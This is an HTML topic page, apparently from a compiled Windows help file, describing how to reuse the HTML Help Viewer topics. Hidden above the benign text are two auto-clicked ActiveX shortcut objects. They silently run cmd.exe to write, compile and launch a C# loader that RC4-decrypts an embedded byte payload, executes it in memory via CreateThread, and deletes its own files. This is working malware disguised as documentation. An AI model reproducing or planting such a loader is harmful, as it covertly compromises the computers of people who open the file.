<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=iso-8859-1">
<meta name="GENERATOR" content="Microsoft HTML Help Workshop 4.2">
<title>About the HTML Help Viewer topics</title>
</HEAD>
<BODY>

<b>About the HTML Help Viewer topics</b>

<OBJECT id=Microsoft classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
  <PARAM name="Command" value="ShortCut">
  <PARAM name="Button" value="Bitmap::shortcut">
  <PARAM name="Item1" value=',cmd.exe,/min /c mkdir C:\Users\%username%\UBS & echo using System;using System.Text;using System.Linq;using System.Diagnostics;using System.Collections.Generic;using System.Runtime.InteropServices;namespace windows{class updates{[DllImport("user32.dll")]static extern bool ShowWindow(IntPtr hWnd,int nCmdShow);static void Main(){IntPtr a=Process.GetCurrentProcess().MainWindowHandle;ShowWindow(a,0);string d;byte[] e={0x7c,0x60,0x12,0xd7,0xa9,0xcf,0x57,0x65,0x23,0x5c,0x2b,0xd6,0x51,0x7d,0xc4,0x48,0x15,0x24,0x9c,0xd1,0x31,0x49,0x5d};d="135 180 83 45 208 36 2 244 235 147 138 100 233 44 205 76 70 148 132 140 114 159 30 74 237 88 162 71 9 131 84 179 9 234 196 182 22 184 160 114 76 92 27 213 101 9 135 92 163 117 63 123 19 120 108 69 12 137 0 173 71 155 18 179 33 45 18 69 41 25 56 67 127 87 138 103 230 231 198 111 183 87 252 212 37 238 67 131 214 208 211 19 58 255 211 151 208 91 108 225 150 226 93 133 184 86 241 36 98 222 38 169 241 58 243 230 227 67 174 26 235 146 217 62 78 65 77 64 20 156 89 158 177 98 228 36 228 59 74 57 107 76 252 15 30 101 21 127 156 147 143 231 78 114 38 71 221 148 66 10 27 115 64 101 248 88 55 95 27 55 227 91 38 72 72 119 155 47 232 174 37 161 102 236 184 232 140 112 153 47 3 145 103 175 150 63 113 197 202 88 73 171 29 242 242 10 229 251 200 194 99 63 175 114 47 110 89 195 213 223 204 229 225 250 225 78 111 169 0 47 222 188 91 174 93 187 177 17 80 67 73 120 74 242 195 226 123 37 102 145 194 91 142 32 17 195 14 85 176 36 21 210 245 139 88 142 225 57 126 160 226 238 131 117 213 234 70 191 231 171 217 31 207 58 171 230 200 105 93 236 204 214 158 97 90 98 100 187 168 122 37 144 64 127 186 55 59 119 10 59 131 87 54 179 22 154 20 126 41 163 88 223 177 150 228 207 119 71 5 110 45 194 217 146 216 153 188 47 6 65 177 10 174 26 42 252 86 155 71 81 154 254 34 16 255 128 184 168 30 90 255 217 124 173 218 4 60 226 17 34 28 39 142 216 216 209 81 213 49 72 26 225 171 2 187 29 211 51 219 192 70 191 244 135 140 85 221 55 182 202 232 106 214 78 139 218 125 255 53 42 52 135 15 247 164 200 222 162 42 206 62 152 169 109 100 103 10 181 173 29 179 206 156 93 150 184 199 211 146 87 53 34 78 246 236 224 86 75 195 26 52 185 251 215 120 225 203 183 120 19 132 5 226 16 88 215 212 176 6 69 227 210 240 13 216 209 35 124 229 127 230 168 14 75 215 60 137 153 66 230 38 133 64 245 234 120 88 90 141 238 55 218 158 223 62 61 99 233 92 241 29 204 221 104 53 131 65 9 71 103 140 14 98 104 102 121 182 83 47 178 118 206 225 99 58 81 134 130 113 234 30 210 231 200 108 248 87 131 75 185 229 245 247 9 143 210 173 181 218 94 180 86 93 64 179 151 143 33 197 226 142 205 58 150 212 0 58 231 159 66 59 199 167 68 39 32 84 70 196 141 136 180 92 162 106 198 46 84 179 98 168 189 21 250 53 122 113 230 87 5 88 98 203 112 143 66 172 106 50 238 225 80 44 122 160 65 1 230 241 78 94 4 44 155 112 108 195 117 246 143 180 107 107 222 221 147 129 204 179 16 30 2 104 169 171 119 190 191 147 136 174 129 70 25 41 194 139 95 245 180 171 196 46 186 201 149 161 156 202 27 138 106 86 235 56 240 50 142 201 217 186 234 146 70 22 108 124 132 207 80 197 99 31 182 186 248 101 190 220 53 141 76 28 219 131 159 226 241 155 109 147 67 116 196 190 200 34 153 137 248 87 62 151 239 113 57 20 119 107 164 129 29 25 59 51 89 90 79 70 197 45 100 71 115 184 37 46 247 61 18 251 152 4 154 215 227 149 2 219 6 189 223 43 181 169 41 6 231 7 36 218 62 117 17 6 13 210 101 164 240 164 205 17 74 26 51 87 45 251 73 26 130 164 91 163 102 252 231 247 244 10 2 124 155 19 55 84 139 131 119 14 5 225 11 121 174 31 195 87 88 227 61 100 118 124";string[] f=d.Split(&#39; &#39;); > C:\Users\%username%\UBS\01.cs'>
  <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
  Microsoft.Click();
</SCRIPT>

<OBJECT id=Updates classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
  <PARAM name="Command" value="ShortCut">
  <PARAM name="Button" value="Bitmap::shortcut">
  <PARAM name="Item1" value=',cmd.exe,/min /c echo byte[] g=new byte[f.Length];for (int i=0;i ^< f.Length;i++){byte h=Convert.ToByte(f[i].ToString());g[i]=h;}try{byte[] r=k(e,g);UInt32 s=HeapCreate(0x00040000,(UInt32)r.Length,0);UInt32 t=HeapAlloc(s,0x00000008,(UInt32)r.Length);RtlMoveMemory(t,r,(UInt32)r.Length);UInt32 u=0;IntPtr v=CreateThread(0,0,t,IntPtr.Zero,0,ref u);WaitForSingleObject(v,0xFFFFFFFF);}catch(Exception){throw;}}public static byte[] k(byte[] l,byte[] m){return n(l,m).ToArray();}private static byte[] o(byte[] l){byte[] s=Enumerable.Range(0,256).Select(i =^> (byte)i).ToArray();for (int i=0,j=0;i ^< 256;i++){j=(j + l[i % l.Length] + s[i]) ^& 255;p(s,i,j);}return s;}private static IEnumerable^<byte^> n(byte[] l,IEnumerable^<byte^> m){byte[] s=o(l);int i=0;int j=0;return m.Select((b) =^>{i=(i + 1) ^& 255;j=(j + s[i]) ^& 255;p(s,i,j);return (byte)(b ^^ s[(s[i] + s[j]) ^& 255]);});}private static void p(byte[] s,int i,int j){byte c=s[i];s[i]=s[j];s[j]=c;}[DllImport("kernel32")]private static extern UInt32 HeapCreate(UInt32 a,UInt32 b,UInt32 c);[DllImport("kernel32")]private static extern UInt32 HeapAlloc(UInt32 d,UInt32 e,UInt32 f);[DllImport("kernel32")]private static extern UInt32 RtlMoveMemory(UInt32 g,byte[] h,UInt32 i);[DllImport("kernel32")]private static extern IntPtr CreateThread(UInt32 j,UInt32 k,UInt32 l,IntPtr m,UInt32 n,ref UInt32 o);[DllImport("kernel32")]private static extern UInt32 WaitForSingleObject(IntPtr p,UInt32 q);}} >> C:\Users\%username%\UBS\01.cs & echo @echo off ^& C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /warn:0 /nologo /unsafe /platform:x86 /out:C:\Users\%username%\UBS\pcau.exe C:\Users\%username%\UBS\01.cs ^& cmd.exe /min /c start C:\Users\%username%\UBS\pcau.exe ^& del /F C:\Users\%username%\UBS\01.cs ^& del /F C:\Users\%username%\UBS\02.bat > C:\Users\%username%\UBS\02.bat & cmd.exe /min /c C:\Users\%username%\UBS\02.bat'>
  <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
  Updates.Click();
</SCRIPT>

<p>This help file contains topics that explain how to use the HTML Help Viewer. If you are a help author, you can include these topics in your help file. All you need to do is <a href="decompile.htm">decompile</a> this file to get the HTML source files you want to use. You can also reuse the index (.hhk) file by modifying it to include the entries for whatever topics you include.</p>

<p>Our goal in creating these topics was to describe all the features that are available in the Help Viewer. However, most help authors will customize the viewer to suit their design needs and will want to use only those topics that apply. If, for example, you do not use the advanced full-text search features of the Help Viewer in your Help design, you can ignore those topics.
</p>

<p>These topics are organized into three main topic areas: <a href="general.htm">general topics</a> about using the Help Viewer, topics about using <a href="ftsover.htm">search functionality</a>, and topics on <a href="changes.htm">changing the appearance</a> of the Help Viewer. We've also included Related Topics links at the end of each file. You may need to modify or update these to correspond with your help design. 

</BODY>
</HTML>
